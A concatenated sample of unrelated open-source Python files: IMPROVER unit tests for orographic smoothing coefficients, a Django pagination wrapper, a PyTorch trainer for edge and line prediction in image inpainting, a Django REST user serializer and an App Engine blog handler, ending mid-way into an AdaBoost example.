# (C) British Crown Copyright 2017-2019 Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Unit tests for the OrographicSmoothingCoefficients utility.
"""
import unittest
import numpy as np
from iris.coords import DimCoord
from iris.cube import Cube
from iris.tests import IrisTest
from improver.utilities.ancillary_creation import OrographicSmoothingCoefficients
from improver.utilities.spatial import DifferenceBetweenAdjacentGridSquares
def set_up_cube():
    """Build the 3x3 precipitation cube used as input by all tests below.

    Both projection coordinates span 0–4 m in 3 points (2 m spacing):
    y on dimension 0, x on dimension 1.
    """
    data = np.array([[1.0, 5.0, 10.0], [3.0, 4.0, 7.0], [0.0, 2.0, 1.0]])
    cube = Cube(data, "precipitation_amount", units="kg m^-2 s^-1")
    coord_names = ["projection_y_coordinate", "projection_x_coordinate"]
    for dim, coord_name in enumerate(coord_names):
        cube.add_dim_coord(
            DimCoord(np.linspace(0.0, 4.0, 3), coord_name, units="m"), dim
        )
    return cube
class Test__init__(IrisTest):
    """Test the init method."""

    def test_basic(self):
        """Test default attribute initialisation"""
        plugin = OrographicSmoothingCoefficients()
        expected_defaults = {
            "min_smoothing_coefficient": 0.0,
            "max_smoothing_coefficient": 1.0,
            "coefficient": 1.0,
            "power": 1.0,
        }
        for attribute, default in expected_defaults.items():
            self.assertEqual(getattr(plugin, attribute), default)
class Test__repr__(IrisTest):
    """Test the repr method."""

    def test_basic(self):
        """Test that the __repr__ returns the expected string."""
        result = str(OrographicSmoothingCoefficients())
        # Expected repr is built from the plugin defaults checked in
        # Test__init__: min 0.0, max 1.0, coefficient 1, power 1.
        msg = (
            "<OrographicSmoothingCoefficients: min_smoothing_coefficient: "
            "{}; max_smoothing_coefficient: {}; coefficient: {}; power: {}"
            ">".format(0.0, 1.0, 1, 1)
        )
        self.assertEqual(result, msg)
class Test_scale_smoothing_coefficients(IrisTest):
    """Class to test the scale_smoothing_coefficients function"""

    def setUp(self):
        """Set up cube & plugin"""
        self.plugin = OrographicSmoothingCoefficients()
        cube = set_up_cube()
        # Two copies: the function is expected to scale each cube in the
        # list identically.
        self.cubelist = [cube, cube]

    def test_basic(self):
        """
        Test the basic function of scale_smoothing_coefficients, using the
        standard max and min smoothing_coefficients.
        """
        result = self.plugin.scale_smoothing_coefficients(self.cubelist)
        # Input values 0..10 rescaled onto the default [0, 1] range.
        expected = np.array([[0.1, 0.5, 1.0], [0.3, 0.4, 0.7], [0.0, 0.2, 0.1]])
        self.assertArrayAlmostEqual(result[0].data, expected)
        self.assertArrayAlmostEqual(result[1].data, expected)

    def test_maxmin(self):
        """
        Tests the function of scale_smoothing_coefficients, using a max
        and min value for smoothing_coefficient.
        """
        result = self.plugin.scale_smoothing_coefficients(self.cubelist, 0.3, 0.5)
        # Same inputs rescaled onto the caller-supplied [0.3, 0.5] range.
        expected = np.array(
            [[0.32, 0.40, 0.50], [0.36, 0.38, 0.44], [0.30, 0.34, 0.32]]
        )
        self.assertArrayAlmostEqual(result[0].data, expected)
        self.assertArrayAlmostEqual(result[1].data, expected)
class Test_unnormalised_smoothing_coefficients(IrisTest):
    """Class to test the basic smoothing_coefficients function"""

    def setUp(self):
        """Set up cube & plugin"""
        # Non-default coefficient/power so the scaling is actually exercised.
        self.plugin = OrographicSmoothingCoefficients(coefficient=0.5, power=2.0)
        self.cube = set_up_cube()

    def test_basic(self):
        """Test data are as expected"""
        # Expected values are coefficient * gradient**power applied to the
        # x-gradient of the setUp cube.
        expected = np.array(
            [[1.53125, 2.53125, 3.78125], [0.0, 0.5, 2.0], [1.53125, 0.03125, 0.78125]]
        )
        gradient_x, _ = DifferenceBetweenAdjacentGridSquares(gradient=True).process(
            self.cube
        )
        smoothing_coefficient_x = self.plugin.unnormalised_smoothing_coefficients(
            gradient_x
        )
        self.assertArrayAlmostEqual(smoothing_coefficient_x.data, expected)
class Test_gradient_to_smoothing_coefficient(IrisTest):
    """Class to test smoothing_coefficients data and metadata output"""

    def setUp(self):
        """Set up cube & plugin"""
        # Deliberately inverted range (min > max) to check the rescaling
        # still behaves.
        self.plugin = OrographicSmoothingCoefficients(
            min_smoothing_coefficient=0.5, max_smoothing_coefficient=0.3
        )
        self.cube = set_up_cube()
        self.gradient_x, self.gradient_y = DifferenceBetweenAdjacentGridSquares(
            gradient=True
        ).process(self.cube)

    def test_basic(self):
        """Test basic version of gradient to smoothing_coefficient"""
        expected = np.array(
            [
                [0.40666667, 0.38, 0.35333333],
                [0.5, 0.44666667, 0.39333333],
                [0.40666667, 0.48666667, 0.43333333],
            ]
        )
        result = self.plugin.gradient_to_smoothing_coefficient(
            self.gradient_x, self.gradient_y
        )
        self.assertEqual(result[0].name(), "smoothing_coefficient_x")
        self.assertArrayAlmostEqual(result[0].data, expected)
        # Time-related metadata must be stripped from the output cubes.
        self.assertNotIn(
            "forecast_period", [coord.name() for coord in result[0].coords()]
        )
        self.assertNotIn(
            "forecast_time", [coord.name() for coord in result[0].coords()]
        )
class Test_process(IrisTest):
    """Class to test end-to-end smoothing_coefficients creation"""

    def setUp(self):
        """Set up cube & plugin"""
        # Inverted range: steepest gradients map to 0, flattest to 1.
        self.plugin = OrographicSmoothingCoefficients(
            min_smoothing_coefficient=1.0, max_smoothing_coefficient=0.0
        )
        self.cube = set_up_cube()

    def test_basic(self):
        """Tests that the final processing step gets the right values."""
        result = self.plugin.process(self.cube)
        # result[0] is the x-direction coefficients, result[1] the y-direction.
        expected_x = np.array(
            [
                [0.53333333, 0.4, 0.26666667],
                [1.0, 0.73333333, 0.46666667],
                [0.53333333, 0.93333333, 0.66666667],
            ]
        )
        expected_y = np.array(
            [
                [0.4, 0.93333333, 0.8],
                [0.93333333, 0.8, 0.4],
                [0.26666667, 0.66666667, 0.0],
            ]
        )
        self.assertArrayAlmostEqual(result[0].data, expected_x)
        self.assertArrayAlmostEqual(result[1].data, expected_y)

    def test_list_error(self):
        """Test that a list of orography input cubes raises a value error"""
        with self.assertRaises(ValueError):
            self.plugin.process([self.cube, self.cube])
# Allow running this test module directly with the standard unittest runner.
if __name__ == "__main__":
    unittest.main()
| StarcoderdataPython |
3261501 | from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator
class Pagination:
    """Thin wrapper around Django's Paginator with forgiving page lookup."""

    def __init__(self, objects, amount):
        # `amount` is the number of objects per page.
        self.paginator = Paginator(objects, amount)

    def items_for_page(self, page):
        """Return the requested page of items.

        Non-integer page values fall back to the first page; out-of-range
        values fall back to the last page.
        """
        try:
            return self.paginator.page(page)
        except PageNotAnInteger:
            return self.paginator.page(1)
        except EmptyPage:
            return self.paginator.page(self.paginator.num_pages)
| StarcoderdataPython |
1621407 | <reponame>DQiaole/ZITS
import math
import os
import time
import cv2
import numpy as np
import torch
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.data.dataloader import DataLoader
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm
try:
from apex import amp
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to run this example.")
class EdgeAccuracy(torch.nn.Module):
    """
    Precision, recall and F1 (as percentages) of a thresholded edge map.
    """

    def __init__(self, threshold=0.5):
        super(EdgeAccuracy, self).__init__()
        self.threshold = threshold

    def __call__(self, inputs, outputs):
        target = inputs > self.threshold
        predicted = outputs > self.threshold

        n_target = torch.sum(target.float())
        n_predicted = torch.sum(predicted.float())
        # Degenerate case: neither map contains any edge pixels.
        # NOTE(review): returns 1 here rather than 100, which is
        # inconsistent with the percentage scale below — preserved as-is
        # because downstream best-score bookkeeping depends on it.
        if n_target == 0 and n_predicted == 0:
            return torch.tensor(1), torch.tensor(1), torch.tensor(1)

        hits = ((predicted == target) * target).float()
        n_hits = torch.sum(hits)
        recall = n_hits / (n_target + 1e-8)
        precision = n_hits / (n_predicted + 1e-8)
        f1_score = (2 * precision * recall) / (precision + recall + 1e-8)
        return precision * 100, recall * 100, f1_score * 100
class TrainerConfig:
    """Hyper-parameter container for the trainers below.

    Class attributes hold the defaults; the constructor overwrites any of
    them per-instance from keyword arguments. Unknown keys are accepted
    silently and simply become new attributes.
    """
    # optimization parameters
    max_epochs = 10
    batch_size = 64          # global batch size, split across GPUs by the trainer
    learning_rate = 3e-4
    betas = (0.9, 0.95)
    grad_norm_clip = 1.0
    weight_decay = 0.1
    # learning-rate schedule (linear warmup then cosine decay), in iterations
    lr_decay = False
    warmup_iterations = 375e6
    final_iterations = 260e9
    iterations_per_epoch = 1e5
    # checkpoint settings
    ckpt_path = None
    num_workers = 0  # for DataLoader

    def __init__(self, **kwargs):
        for k, v in kwargs.items():
            setattr(self, k, v)
class TrainerForContinuousEdgeLine:
    """Distributed (DDP-style) trainer for the joint edge/line prediction model.

    Handles checkpointing, optional Apex AMP, LR warmup/cosine decay,
    periodic sample visualisation and per-epoch validation with EdgeAccuracy.
    """

    def __init__(self, model, train_dataset, test_dataset, config, gpu, global_rank, iterations_per_epoch, logger=None):
        self.model = model
        self.train_dataset = train_dataset
        self.test_dataset = test_dataset
        self.iterations_per_epoch = iterations_per_epoch
        self.config = config
        self.device = gpu
        # NOTE(review): self.model is assigned twice (also above) — harmless
        # but redundant.
        self.model = model
        self.metric = EdgeAccuracy(threshold=0.5)
        self.global_rank = global_rank
        self.train_sampler = DistributedSampler(train_dataset, num_replicas=config.world_size,
                                                rank=global_rank, shuffle=True)
        self.logger = logger

    def save_checkpoint(self, epoch, optim, iterations, validation, edgeF1, lineF1, save_name):
        """Persist model/optimizer state plus bookkeeping under ckpt_path/<save_name>.pth.

        Only executed on global rank 0 so a single process writes the file.
        """
        if self.global_rank == 0:  # Only save in global rank 0
            raw_model = self.model.module if hasattr(self.model, "module") else self.model
            save_url = os.path.join(self.config.ckpt_path, save_name + '.pth')
            self.logger.info("saving %s", save_url)
            torch.save({'model': raw_model.state_dict(),
                        'epoch': epoch,
                        'optimizer': optim.state_dict(),
                        'iterations': iterations,
                        'best_validation': validation,
                        'edgeF1': edgeF1,
                        'lineF1': lineF1}, save_url)

    def load_checkpoint(self, resume_path):
        """Load model weights from resume_path and move the model to the device.

        Returns the raw checkpoint dict (so train() can restore the optimizer
        and counters), or None when no checkpoint file exists.
        """
        if os.path.exists(resume_path):
            data = torch.load(resume_path)
            self.model.load_state_dict(data['model'])
            self.model = self.model.to(self.device)
            if self.global_rank == 0:
                self.logger.info('Finished reloading the Epoch %d model' % (data['epoch']))
            return data
        else:
            self.model = self.model.to(self.device)
            if self.global_rank == 0:
                self.logger.info('Warnning: There is no trained model found. An initialized model will be used.')
            return None

    def train(self, loaded_ckpt):
        """Run the full training loop, resuming from loaded_ckpt when given.

        Validates after every epoch and keeps both a 'latest' checkpoint and
        a 'best' checkpoint (highest mean of edge and line F1).
        """
        model, config = self.model, self.config
        raw_model = model.module if hasattr(self.model, "module") else model
        optimizer = raw_model.configure_optimizers(config)
        if self.config.AMP:  ## use AMP
            model, optimizer = amp.initialize(model, optimizer, num_losses=1, opt_level='O1')
        previous_epoch = -1
        bestAverageF1 = 0
        if loaded_ckpt is not None:
            # Restore optimizer state and counters so the schedule continues
            # exactly where it left off.
            optimizer.load_state_dict(loaded_ckpt['optimizer'])
            self.iterations = loaded_ckpt['iterations']
            bestAverageF1 = loaded_ckpt['best_validation']
            previous_epoch = loaded_ckpt['epoch']
            if self.global_rank == 0:
                self.logger.info('Finished reloading the Epoch %d optimizer' % (loaded_ckpt['epoch']))
        else:
            if self.global_rank == 0:
                self.logger.info(
                    'Warnning: There is no previous optimizer found. An initialized optimizer will be used.')
        train_loader = DataLoader(self.train_dataset, pin_memory=True,
                                  batch_size=config.batch_size // config.world_size,  # BS of each GPU
                                  num_workers=config.num_workers, sampler=self.train_sampler)
        test_loader = DataLoader(self.test_dataset, shuffle=False, pin_memory=True,
                                 batch_size=config.batch_size // config.world_size,
                                 num_workers=config.num_workers)
        if loaded_ckpt is None:
            self.iterations = 0  # counter used for learning rate decay
        for epoch in range(config.max_epochs):
            # Skip epochs already completed before the resume point.
            if previous_epoch != -1 and epoch <= previous_epoch:
                continue
            if epoch == previous_epoch + 1 and self.global_rank == 0:
                self.logger.info("Resume from Epoch %d" % (epoch))
            self.train_sampler.set_epoch(epoch)  ## Shuffle each epoch
            epoch_start = time.time()
            model.train()
            loader = train_loader
            losses = []
            not_show_tqdm = True
            for it, items in enumerate(tqdm(loader, disable=not_show_tqdm)):
                # place data on the correct device
                for k in items:
                    if type(items[k]) is torch.Tensor:
                        items[k] = items[k].to(self.device)
                # Ground-truth edge/line maps are passed twice: once as the
                # conditioning inputs and once as the training targets.
                edge, line, loss = model(items['img'], items['edge'], items['line'], items['edge'], items['line'],
                                         items['mask'])
                loss = loss.mean()  # collapse all losses if they are scattered on multiple gpus
                losses.append(loss.item())
                # backprop and update the parameters
                self.iterations += 1  # number of iterations processed this step (i.e. label is not -100)
                model.zero_grad()
                if self.config.AMP:
                    with amp.scale_loss(loss, optimizer, loss_id=0) as loss_scaled:
                        loss_scaled.backward()
                    torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), config.grad_norm_clip)
                else:
                    loss.backward()
                    torch.nn.utils.clip_grad_norm_(model.parameters(), config.grad_norm_clip)
                optimizer.step()
                # decay the learning rate based on our progress
                if config.lr_decay:
                    if self.iterations < config.warmup_iterations:
                        # linear warmup
                        lr_mult = float(self.iterations) / float(max(1, config.warmup_iterations))
                    else:
                        # cosine learning rate decay
                        progress = float(self.iterations - config.warmup_iterations) / float(
                            max(1, config.final_iterations - config.warmup_iterations))
                        lr_mult = max(0.1, 0.5 * (1.0 + math.cos(math.pi * progress)))
                    lr = config.learning_rate * lr_mult
                    for param_group in optimizer.param_groups:
                        param_group['lr'] = lr
                else:
                    lr = config.learning_rate
                if it % self.config.print_freq == 0 and self.global_rank == 0:
                    self.logger.info(
                        f"epoch {epoch + 1} iter {it}/{self.iterations_per_epoch}: train loss {loss.item():.5f}. lr {lr:e}")
                # Every ~2000 iterations, dump a visual comparison strip of
                # GT / masked inputs / predictions for the first 4 samples.
                if self.iterations % 2000 == 1 and self.global_rank == 0:
                    edge_output = edge[:4, :, :, :].squeeze(1).cpu()
                    edge_output = torch.cat(tuple(edge_output), dim=0)
                    line_output = line[:4, :, :, :].squeeze(1).cpu()
                    line_output = torch.cat(tuple(line_output), dim=0)
                    masked_edges = (items['edge'][:4, ...] * (1 - items['mask'][:4, ...])).squeeze(1).cpu()
                    original_edge = items['edge'][:4, ...].squeeze(1).cpu()
                    masked_lines = (items['line'][:4, ...] * (1 - items['mask'][:4, ...])).squeeze(1).cpu()
                    original_line = items['line'][:4, ...].squeeze(1).cpu()
                    masked_edges = torch.cat(tuple(masked_edges), dim=0)
                    original_edge = torch.cat(tuple(original_edge), dim=0)
                    masked_lines = torch.cat(tuple(masked_lines), dim=0)
                    original_line = torch.cat(tuple(original_line), dim=0)
                    output = torch.cat([original_edge.float(), original_line.float(), masked_edges.float(),
                                        masked_lines.float(), edge_output.float(), line_output.float()],
                                       dim=-1)[:, :, None].repeat(1, 1, 3)
                    output *= 255
                    output = output.detach().numpy().astype(np.uint8)
                    # Undo the [-1, 1] normalisation of the input images.
                    current_img = items['img'][:4, ...] * 0.5 + 0.5
                    current_img = current_img.permute(0, 2, 3, 1) * 255
                    original_img = np.concatenate(current_img.cpu().numpy().astype(np.uint8), axis=0)
                    mask = items['mask'][:4, ...].permute(0, 2, 3, 1)
                    current_img = (current_img * (1 - mask)).cpu().numpy().astype(np.uint8)
                    current_img = np.concatenate(current_img, axis=0)
                    output = np.concatenate([original_img, current_img, output], axis=1)
                    save_path = self.config.ckpt_path + '/samples'
                    os.makedirs(save_path, exist_ok=True)
                    # [:, :, ::-1]: RGB -> BGR for cv2.imwrite.
                    cv2.imwrite(save_path + '/' + str(self.iterations) + '.jpg', output[:, :, ::-1])
            # eval
            model.eval()
            edge_P, edge_R, edge_F1, line_P, line_R, line_F1 = self.val(model, test_loader)
            model.train()
            average_F1 = (edge_F1 + line_F1) / 2
            self.logger.info("Epoch: %d, edge_P: %f, edge_R: %f, edge_F1: %f, line_P: %f, line_R: %f, "
                             "line_F1: %f, ave_F1: %f time for 2k iter: %d seconds" %
                             (epoch, edge_P, edge_R, edge_F1, line_P, line_R, line_F1, average_F1,
                              time.time() - epoch_start))
            # supports early stopping based on the test loss, or just save always if no test set is provided
            good_model = self.test_dataset is None or average_F1 >= bestAverageF1
            if self.config.ckpt_path is not None and good_model and self.global_rank == 0:  ## Validation on the global_rank==0 process
                bestAverageF1 = average_F1
                EdgeF1 = edge_F1
                LineF1 = line_F1
                self.logger.info("current best epoch is %d" % (epoch))
                self.save_checkpoint(epoch, optimizer, self.iterations, bestAverageF1, EdgeF1, LineF1,
                                     save_name='best')
            self.save_checkpoint(epoch, optimizer, self.iterations, average_F1, edge_F1, line_F1,
                                 save_name='latest')

    def val(self, model, dataloader):
        """Evaluate precision/recall/F1 of edge and line maps inside the mask.

        Returns six floats: mean edge P/R/F1 then mean line P/R/F1 over the
        whole dataloader.
        """
        edge_precisions, edge_recalls, edge_f1s = [], [], []
        line_precisions, line_recalls, line_f1s = [], [], []
        for it, items in enumerate(tqdm(dataloader, disable=False)):
            # place data on the correct device
            for k in items:
                if type(items[k]) is torch.Tensor:
                    items[k] = items[k].to(self.device)
            with torch.no_grad():
                edge, line, _ = model(items['img'], items['edge'], items['line'], masks=items['mask'])
            edge_preds = edge
            line_preds = line
            # Metrics are computed only inside the masked (inpainted) region.
            precision, recall, f1 = self.metric(items['edge'] * items['mask'], edge_preds * items['mask'])
            edge_precisions.append(precision.item())
            edge_recalls.append(recall.item())
            edge_f1s.append(f1.item())
            precision, recall, f1 = self.metric(items['line'] * items['mask'],
                                                line_preds * items['mask'])
            line_precisions.append(precision.item())
            line_recalls.append(recall.item())
            line_f1s.append(f1.item())
        return float(np.mean(edge_precisions)), float(np.mean(edge_recalls)), float(np.mean(edge_f1s)), \
               float(np.mean(line_precisions)), float(np.mean(line_recalls)), float(np.mean(line_f1s))
class TrainerForEdgeLineFinetune(TrainerForContinuousEdgeLine):
    """Fine-tunes the edge/line prediction model on pre-masked images.

    Differs from the parent trainer in the forward pass: the model consumes
    ``mask_img`` (the already-masked image) together with the eroded mask
    ``erode_mask``, and the ground-truth edge/line maps appear twice in the
    call — presumably once as input prior and once as supervision target
    (TODO confirm against the model's forward signature).
    """

    def __init__(self, model, train_dataset, test_dataset, config, gpu, global_rank, iterations_per_epoch, logger=None):
        # All shared bookkeeping (device, sampler, metric, ...) is set up by the parent.
        super().__init__(model, train_dataset, test_dataset, config, gpu, global_rank, iterations_per_epoch, logger)

    def train(self, loaded_ckpt):
        """Run the fine-tuning loop, periodically sampling and validating.

        Args:
            loaded_ckpt: checkpoint dict to resume from (keys: 'optimizer',
                'iterations', 'best_validation', 'epoch'), or None to start
                from scratch.
        """
        model, config = self.model, self.config
        # Unwrap DistributedDataParallel (if any) to reach the optimizer factory.
        raw_model = model.module if hasattr(self.model, "module") else model
        optimizer = raw_model.configure_optimizers(config)
        if self.config.AMP:  # use AMP (NVIDIA apex mixed precision)
            model, optimizer = amp.initialize(model, optimizer, num_losses=1, opt_level='O1')
        previous_epoch = -1
        bestAverageF1 = 0
        if loaded_ckpt is not None:
            # Resume optimizer state and the training progress counters.
            optimizer.load_state_dict(loaded_ckpt['optimizer'])
            self.iterations = loaded_ckpt['iterations']
            bestAverageF1 = loaded_ckpt['best_validation']
            previous_epoch = loaded_ckpt['epoch']
            if self.global_rank == 0:
                self.logger.info('Finished reloading the Epoch %d optimizer' % (loaded_ckpt['epoch']))
        else:
            if self.global_rank == 0:
                # NOTE(review): "Warnning" typo kept as-is — it is runtime log text.
                self.logger.info(
                    'Warnning: There is no previous optimizer found. An initialized optimizer will be used.')
        # TODO: Use different seeds to initialize each worker. (This issue is caused by the bug of pytorch itself)
        train_loader = DataLoader(self.train_dataset, pin_memory=True,
                                  batch_size=config.batch_size // config.world_size,  # BS of each GPU
                                  num_workers=config.num_workers, sampler=self.train_sampler)
        test_loader = DataLoader(self.test_dataset, shuffle=False, pin_memory=True,
                                 batch_size=config.batch_size // config.world_size,
                                 num_workers=config.num_workers)
        if loaded_ckpt is None:
            self.iterations = 0  # counter used for learning rate decay
        for epoch in range(config.max_epochs):
            # Skip epochs already completed before resuming.
            if previous_epoch != -1 and epoch <= previous_epoch:
                continue
            if epoch == previous_epoch + 1 and self.global_rank == 0:
                self.logger.info("Resume from Epoch %d" % (epoch))
            self.train_sampler.set_epoch(epoch)  ## Shuffle each epoch
            epoch_start = time.time()
            model.train()
            loader = train_loader
            losses = []
            not_show_tqdm = True
            for it, items in enumerate(tqdm(loader, disable=not_show_tqdm)):
                # place data on the correct device
                for k in items:
                    if type(items[k]) is torch.Tensor:
                        items[k] = items[k].to(self.device)
                # Forward on the masked image; 'edge'/'line' passed twice —
                # presumably (prior, target); confirm against the model API.
                edge, line, loss = model(items['mask_img'], items['edge'], items['line'], items['edge'], items['line'],
                                         items['erode_mask'])
                loss = loss.mean()  # collapse all losses if they are scattered on multiple gpus
                losses.append(loss.item())
                # backprop and update the parameters
                self.iterations += 1  # number of iterations processed this step (i.e. label is not -100)
                model.zero_grad()
                if self.config.AMP:
                    # Scale the loss through apex so FP16 gradients do not underflow.
                    with amp.scale_loss(loss, optimizer, loss_id=0) as loss_scaled:
                        loss_scaled.backward()
                    torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), config.grad_norm_clip)
                else:
                    loss.backward()
                    torch.nn.utils.clip_grad_norm_(model.parameters(), config.grad_norm_clip)
                optimizer.step()
                # decay the learning rate based on our progress
                if config.lr_decay:
                    if self.iterations < config.warmup_iterations:
                        # linear warmup
                        lr_mult = float(self.iterations) / float(max(1, config.warmup_iterations))
                    else:
                        # cosine learning rate decay
                        progress = float(self.iterations - config.warmup_iterations) / float(
                            max(1, config.final_iterations - config.warmup_iterations))
                        lr_mult = max(0.1, 0.5 * (1.0 + math.cos(math.pi * progress)))
                    lr = config.learning_rate * lr_mult
                    for param_group in optimizer.param_groups:
                        param_group['lr'] = lr
                else:
                    lr = config.learning_rate
                if it % self.config.print_freq == 0 and self.global_rank == 0:
                    self.logger.info(
                        f"epoch {epoch + 1} iter {it}/{self.iterations_per_epoch}: train loss {loss.item():.5f}. lr {lr:e}")
                # Every 2000 iterations (rank 0 only): dump a qualitative sample
                # sheet, run validation and checkpoint.
                if self.iterations % 2000 == 1 and self.global_rank == 0:
                    # Stack the first four samples vertically for visualisation.
                    edge_output = edge[:4, :, :, :].squeeze(1).cpu()
                    edge_output = torch.cat(tuple(edge_output), dim=0)
                    line_output = line[:4, :, :, :].squeeze(1).cpu()
                    line_output = torch.cat(tuple(line_output), dim=0)
                    masked_edges = (items['edge'][:4, ...] * (1 - items['erode_mask'][:4, ...])).squeeze(1).cpu()
                    original_edge = items['edge'][:4, ...].squeeze(1).cpu()
                    masked_lines = (items['line'][:4, ...] * (1 - items['erode_mask'][:4, ...])).squeeze(1).cpu()
                    original_line = items['line'][:4, ...].squeeze(1).cpu()
                    masked_edges = torch.cat(tuple(masked_edges), dim=0)
                    original_edge = torch.cat(tuple(original_edge), dim=0)
                    masked_lines = torch.cat(tuple(masked_lines), dim=0)
                    original_line = torch.cat(tuple(original_line), dim=0)
                    # Six panels side by side, replicated to three channels.
                    output = torch.cat([original_edge.float(), original_line.float(), masked_edges.float(),
                                        masked_lines.float(), edge_output.float(), line_output.float()],
                                       dim=-1)[:, :, None].repeat(1, 1, 3)
                    output *= 255
                    output = output.detach().numpy().astype(np.uint8)
                    # Undo the [-1, 1] normalisation of the input image.
                    current_img = items['img'][:4, ...] * 0.5 + 0.5
                    current_img = current_img.permute(0, 2, 3, 1) * 255
                    original_img = np.concatenate(current_img.cpu().numpy().astype(np.uint8), axis=0)
                    mask = items['mask'][:4, ...].permute(0, 2, 3, 1)
                    current_img = (current_img * (1 - mask)).cpu().numpy().astype(np.uint8)
                    current_img = np.concatenate(current_img, axis=0)
                    output = np.concatenate([original_img, current_img, output], axis=1)
                    save_path = self.config.ckpt_path + '/samples'
                    os.makedirs(save_path, exist_ok=True)
                    # [:, :, ::-1] flips RGB -> BGR for OpenCV.
                    cv2.imwrite(save_path + '/' + str(self.iterations) + '.jpg', output[:, :, ::-1])
                    # eval
                    model.eval()
                    edge_P, edge_R, edge_F1, line_P, line_R, line_F1 = self.val(model, test_loader)
                    model.train()
                    average_F1 = (edge_F1 + line_F1) / 2
                    self.logger.info("Epoch: %d, edge_P: %f, edge_R: %f, edge_F1: %f, line_P: %f, line_R: %f, "
                                     "line_F1: %f, ave_F1: %f time for 2k iter: %d seconds" %
                                     (epoch, edge_P, edge_R, edge_F1, line_P, line_R, line_F1, average_F1,
                                      time.time() - epoch_start))
                    # supports early stopping based on the test loss, or just save always if no test set is provided
                    good_model = self.test_dataset is None or average_F1 >= bestAverageF1
                    if self.config.ckpt_path is not None and good_model and self.global_rank == 0:  ## Validation on the global_rank==0 process
                        bestAverageF1 = average_F1
                        EdgeF1 = edge_F1
                        LineF1 = line_F1
                        self.logger.info("current best epoch is %d" % (epoch))
                        self.save_checkpoint(epoch, optimizer, self.iterations, bestAverageF1, EdgeF1, LineF1,
                                             save_name='best')
                    # The 'latest' checkpoint is refreshed on every validation.
                    self.save_checkpoint(epoch, optimizer, self.iterations, average_F1, edge_F1, line_F1,
                                         save_name='latest')

    def val(self, model, dataloader):
        """Validate on the eroded-mask region.

        Returns mean precision/recall/F1 for edges, then for lines.
        """
        edge_precisions, edge_recalls, edge_f1s = [], [], []
        line_precisions, line_recalls, line_f1s = [], [], []
        for it, items in enumerate(tqdm(dataloader, disable=False)):
            # place data on the correct device
            for k in items:
                if type(items[k]) is torch.Tensor:
                    items[k] = items[k].to(self.device)
            with torch.no_grad():
                edge, line, _ = model(items['mask_img'], items['edge'], items['line'], masks=items['erode_mask'])
            edge_preds = edge
            line_preds = line
            # Metrics restricted to the eroded masked region.
            precision, recall, f1 = self.metric(items['edge'] * items['erode_mask'], edge_preds * items['erode_mask'])
            edge_precisions.append(precision.item())
            edge_recalls.append(recall.item())
            edge_f1s.append(f1.item())
            precision, recall, f1 = self.metric(items['line'] * items['erode_mask'], line_preds * items['erode_mask'])
            line_precisions.append(precision.item())
            line_recalls.append(recall.item())
            line_f1s.append(f1.item())
        return float(np.mean(edge_precisions)), float(np.mean(edge_recalls)), float(np.mean(edge_f1s)), \
               float(np.mean(line_precisions)), float(np.mean(line_recalls)), float(np.mean(line_f1s))
| StarcoderdataPython |
3309033 | from stockpricer.model import Pricer | StarcoderdataPython |
20451 | <reponame>major-hub/soil_app
from rest_framework import serializers
from user.models import User
from main.exceptions.user_exceptions import UserException
user_exception = UserException
class UserRegisterSerializer(serializers.ModelSerializer):
    """Registration payload serializer.

    Accepts the user fields plus a ``password_confirmation`` field, which
    must equal ``password`` and is stripped before model creation.
    """
    password_confirmation = serializers.CharField(max_length=128)

    class Meta:
        model = User
        fields = ['email', 'phone_number', 'first_name', 'last_name', 'password', 'password_confirmation']

    def validate(self, attrs):
        # Remove the confirmation value so it never reaches User creation.
        confirmation = attrs.pop('password_confirmation')
        if attrs.get('password') != confirmation:
            raise serializers.ValidationError({'non_field_errors': user_exception("NOT_MATCHED_PASSWORDS").message})
        return attrs
class UserLoginSerializer(serializers.Serializer):
    """Declares the login payload: an email/password pair.

    Plain (non-model) serializer — credential checking happens in the view.
    """
    email = serializers.EmailField(max_length=255)
    password = serializers.CharField(max_length=128)
| StarcoderdataPython |
4835941 | <reponame>byanofsky/simple-blog
from google.appengine.datastore.datastore_query import Cursor
from handlers.basehandler import BaseHandler
from models.post import Post
class FrontPageHandler(BaseHandler):
    """Renders the blog front page with the most recent posts."""

    def get(self):
        """Fetch one page of posts and render the front page template."""
        # Number of posts a single page shows.
        posts_per_page = 10
        # Resume listing from the cursor passed in the query string, if any.
        # TODO: can we move cursor to post? to reduce imports?
        page_cursor = Cursor(urlsafe=self.request.get('cursor'))
        posts, next_cursor, more = Post.get_n_posts(
            n=posts_per_page,
            cursor=page_cursor
        )
        # next_cursor.urlsafe() would feed the pagination link once the
        # multi-page front page is implemented.
        self.render('frontpage.html', posts=posts)
| StarcoderdataPython |
4840542 | import numpy as np
# Apply AdaBoost on the simple toy data set.
def loadSimpData():
    """Return the tiny five-sample toy data set used to exercise AdaBoost.

    Returns:
